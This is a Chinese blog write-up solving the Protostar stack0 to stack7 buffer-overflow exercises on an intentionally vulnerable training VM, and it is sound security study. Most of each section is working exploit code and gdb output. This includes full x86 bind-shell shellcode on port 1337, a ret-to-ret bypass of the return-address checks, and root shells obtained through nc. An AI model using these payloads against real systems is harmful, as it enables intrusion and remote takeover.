欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Protostar Stack Write Up

程序员文章站 2024-03-19 00:00:04
...

Protostar Stack0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

思路:buffer溢出改变modified的值

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

Protostar Stack1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

思路:buffer溢出改变modified的值为0x61626364

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value

Protostar Stack2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

思路:buffer溢出改变modified的值为0x0d0a0d0a,而buffer是从环境变量GREENIE复制过来的,所以设置一下该环境变量就好。

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

这是在自己本地的Ubuntu 16.04下的执行结果

但在protostar虚拟机里,执行失败

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

不给设置这样的变量名

不服,写个脚本试试

import os

os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')
$ python se.py 
you have correctly modified the variable

OK

Protostar Stack3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

思路:查安全机制

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什么都没开,那么只需要反汇编看一下win的地址,利用buffer溢出就好

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>: push   ebp
   0x08048425 <+1>: mov    ebp,esp
   0x08048427 <+3>: sub    esp,0x18
   0x0804842a <+6>: mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <[email protected]>
   0x08048436 <+18>:    leave  
   0x08048437 <+19>:    ret    
End of assembler dump.

找到win()的地址为0x08048424,编写payload过关

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

代码真简洁!
思路:溢出buffer,造成崩溃,找到rip被覆盖的偏移量,放入win()的地址

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

覆盖eip的偏移量为76

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

win()的地址为0x80483f4

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

思路:检查安全机制

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什么也没开,所以,应该可以控制eip,执行shellcode。找到一个shell_bind_tcp 的shellcode,共89字节,端口号为1337。

生成长度为200的测试字符串

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

运行

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip崩溃在0x41344141(‘AA4A’)

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

偏移量为76

此时esp的地址为0xffffcec0,也是我们控制eip要转到的地址,内容为

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

长度为120,可以容纳89字节的shellcode,还可以在shellcode前执行一段nop指令。构造payload:’A’*76+shellcode地址+shellcode

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault!查看core

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

查看0xffffceff附近的存储情况

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

我们的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

还是Segmentation fault!再查看core

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

查看附近内存

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

发现我们的设置的返回地址0xffffcf00中的\x00字节不在内存中,悟了!\x00字节发送不了!但是我设了16个字节的nop,返回地址往后移1到16位都行,对吧?就移1位好了,修改返回地址为0xffffcf01

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

成功!

protostar虚拟机里的esp的地址:0xbffffcc0

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

protostar虚拟机里没有发现gdb与直接运行时esp不一致的问题

Protostar Stack6

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

返回地址被限制不能在栈中我们可操作的部分
思路:虽然被限制了,但只是限制了getpath函数的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此时只要在栈顶设置好shellcode的地址,就可以绕过限制

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

这次getpath()的返回地址偏移量为80

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

栈指针地址为0xffffceb0,偏移量为84

构造payload:’A’*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault!查看core文件

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

查一下附近的存储情况

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

发现问题了:我们第二次的返回地址应该是0xffffced4,而不是0xffffceb4

而且在连续存储64个A之后,出现了有4个A被替换的情况,此处不解,路过的friend懂的希望不吝赐教

修改payload

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc

上面是在本机Ubuntu上折腾的结果。在protostar的虚拟机上,同样栈指针的地址要加32个字节。获得的esp地址是0xbffffd20,本来+4就是0xbffffd24,但是要再加32个字节变成0xbffffd44才是正解。

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

我尝试了在gdb里执行payload,发现gdb里是不用加32字节的,难道是gdb与系统直接运行的区别?

Protostar Stack7

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

思路:和stack6一样的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

小结

失败不可怕,可怕的是不去找出失败的原因。

相关标签: buffer